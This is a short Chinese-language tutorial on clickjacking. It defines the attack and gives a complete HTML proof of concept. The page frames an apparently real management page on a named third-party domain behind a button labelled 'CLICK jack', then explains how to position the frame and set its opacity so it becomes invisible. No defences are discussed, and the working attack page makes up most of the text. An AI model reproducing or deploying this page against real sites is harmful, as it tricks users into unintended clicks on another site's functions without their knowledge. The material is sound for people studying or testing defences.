什么是点击劫持:
是一种视觉上的欺骗,攻击者使用一个透明的,不可见的iframe标签,覆盖在一个网页上,诱使用户在该网页上进行操作,用户在不知情的情况下点击透明的iframe页面通过调整iframe页面的位置可以诱使用户恰好点击在iframe页面的的一些功能性按钮上
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>click jack</title>
<style>
iframe{
width:900px;
height: 250px;
top: -195px;
left:-740px;
z-index: 2;
-moz-opacity:0.5;
opacity: 0.5;
filter:alpha(opacity=0.5);
}
button {
position: absolute;
top: 10px;
left: 10px;
width: 120px;
z-index:1;
}
</style>
</head>
<body>
<iframe src="http://search.esgcc.com.cn/managerGf/toGfIndexPage" scrolling="no"></iframe>
<button>CLICK jack</button>
</body>
</html>
通过控制iframe的长宽,调整top,left的位置,可以把iframe页面内任意部分覆盖到任何地方。
同时设置iframe的position位absolute并将z-index的设置为最大已达到让iframe在页面最上层。
最后,通过设置opacity来控制iframe页面的透明度,值为0是完全不可见